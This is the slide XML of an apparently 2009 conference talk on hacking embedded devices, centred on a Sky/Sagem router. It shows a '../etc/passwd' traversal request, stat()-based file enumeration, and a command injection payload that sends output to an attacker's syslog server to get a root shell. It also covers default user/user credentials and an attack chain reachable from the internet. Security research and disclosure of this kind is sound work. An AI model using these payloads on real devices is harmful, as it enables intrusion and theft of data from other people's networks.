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75" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="277" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="270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5D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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5D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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D5E389-0C47-A641-AD72-5541CDF93922}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/3/09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35E3E2-7403-C842-8F58-4E27AA2FB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ackerfantastic.com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mirandaupnptoo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Hacking Embedded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18562"/>
            <a:ext cx="6172200" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for Fun &amp; Profit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690" y="0"/>
            <a:ext cx="2092310" cy="1388533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UPNP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>miranda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17638"/>
            <a:ext cx="6645625" cy="5166974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UPNP Attacks – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Port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3388"/>
            <a:ext cx="6528064" cy="4910564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Source Luke!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Reviewing Directory Traversal Protection in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>micro_httpd.c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i="1" dirty="0" smtClean="0"/>
              <a:t>74: if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>( line, "%[^ ] %[^ ] %[^ ]", method, path, protocol ) != 3) …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>83: if ( path[0] != '/’ ) …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>85: file = &amp;(path[1]); …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>90: if ( file[0] == '/' || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>( file, ".." ) == 0 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>( file, "../", 3 ) == 0 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>( file, "/../" ) != (char*) 0 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>( &amp;(file[len-3]), "/.." ) == 0 ) …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET /../ HTTP/1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variants are successfully detected. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attempts to request files outside of PATH fail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seems to protect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>micro_httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> under normal operation.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protection! Test cases!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Copy the routine into a stand-alone C program so that potential strings and bypasses can be tested quickly.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921000"/>
            <a:ext cx="7340600" cy="30480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the devices ice with stat()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micro_httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> extended by Sky / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sagem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modified source code breaks the “secure” check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File arguments to CGI scripts could traverse ONE directory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single ../ not matched if a CGI argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One directory is enough to reach root file system /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sky_temp.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a code path to stat() files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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sky_temp.html?status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=501&amp;title=&amp;text=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>this_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=../etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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If a file or directory exists "No element returned.” in response.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We can now enumerate all the files &amp; directories on the device.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stat() information leak is born!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Enumerating contents of “/bin” using python and shell scripts.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99" y="2654300"/>
            <a:ext cx="4267200" cy="35814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 command execution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standard Web Application assessment tools I tested each CGI input and FORM request for potential Command Injection bugs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We use common shell escape characters  ; ` | &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The stat() information leak shows /bin/ping exists.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We try |/bin/ping 192.168.0.3 and similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-blind command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can see the output of commands on the web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blind command injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can put a packet sniffer on the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Vulnerability is found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DynDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> screen!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User input passed to shell from CGI arguments.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successful exploitation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75" y="1383772"/>
            <a:ext cx="6534244" cy="514614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device exploit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Injection is completely blind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection has a character limit of 40 chars.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Telnet connect back shell?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No telnet or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tunnel the command output via DNS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Works over UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Could be used to handle some string data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Might be difficult to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tunnel the command output via SYSLOG?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Works over UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can handle string output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probably already implemented for us!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tips &amp; Tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$IFS can be used as a whitespace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2&gt;&amp;1 can be used to redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stderr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Try to URL encode problem chars! i.e. 2&gt;%261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exploit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Configure the attackers IP as remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslogd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This can be done through the Web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listen on UDP port 514 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using command injection pass output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ddnsHostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=|logger -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 0 ”`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /bin`”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String will send output of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /bin’ to remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pseudo-interactive shell allows for better attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once we have a shell we maybe able to view files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload/Download binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Explore the device configuration &amp; settings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talk intends to cover!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&amp; Where are Embedded Devices?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why history lessons should be learnt!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Caveats &amp; Defects in Embedded Platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Case Study: Looking at a Consumer Device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thin Client Devices</a:t>
            </a:r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scooby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! A root shell is born!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00200"/>
            <a:ext cx="7429500" cy="46482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&amp;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Hidden users in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file not in manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Root user has been renamed to “admin”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible to use “user/user” to authenticate to web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Could not change password of user – auth bypass.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What are the other users for?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03752"/>
            <a:ext cx="7518400" cy="28702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sniffer comes built-in!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10267"/>
            <a:ext cx="7429500" cy="42926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transfer? – Use TFTP!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29833"/>
            <a:ext cx="7429500" cy="42926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from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Sky user clicks on a link, XSS or IFRAME attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash UPnP exposes the Sky web service to WAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Could use IFRAME with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to send? (prompts!!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET request works just as well as a POST request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible avenue of attack, couldn’t get working.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default “user/user” authenticates to web device from Internet. No password change? Auth bypass!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker sets internet IP as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> daemon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker starts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pseduo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> interactive shell on device and has “admin” (root) rights thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd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Attacker can now run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a network sniffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>transfer files to and from the network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and more.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Thin-Clients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Embedded Devices are not just limited to the home!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thin-Clients are becoming a wide-spread Desktop alternative in Corporate environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using similar techniques from this presentation I found a number of vulnerabilities including command injection in a web interface and arbitrary command injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suffers from many of the same “common” embedded device flaws, everything running as root or SYSTEM!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Management protocols lacking encryption meant it was possible to impersonate management software and hijack devices. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and more observations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are covered in a recent whitepaper release.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Hacker Fantastic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Blog/Twitter/Code &amp; Stuff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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.hackerfantastic.com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690" y="211667"/>
            <a:ext cx="2092310" cy="1388533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&amp; where are embedded devices?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Everything &amp; Everywhere!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t-mobile-g1-lar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63" y="2482661"/>
            <a:ext cx="1936175" cy="1673098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="PTC201CI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433" y="2409200"/>
            <a:ext cx="1603185" cy="1509432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Linksys_voice_rout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801469"/>
            <a:ext cx="2332238" cy="1281176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="fujifilm-finepix-s8000fd-digital-camer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054" y="4155759"/>
            <a:ext cx="1893745" cy="1926886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="D-Link-2640T-Rout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750" y="4269510"/>
            <a:ext cx="2147068" cy="1813135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="bt-home-hu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932" y="2089831"/>
            <a:ext cx="1828801" cy="1828801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Embedded Devices are often “Black Box”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Minimal or no documentation &amp; source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security through obscurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provided as “Secure” Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vendors have a long history of telling the truth! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provided along with Security Software by ISP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anti-Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewall Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History of Security Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DD-WRT Remote Root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>O2 Wireless Box CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeThere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BTHomeHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> CSRF &amp; More </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consumer Devices becoming popular targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Psyb0t worm.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repeats itself…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 run with no privilege separation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
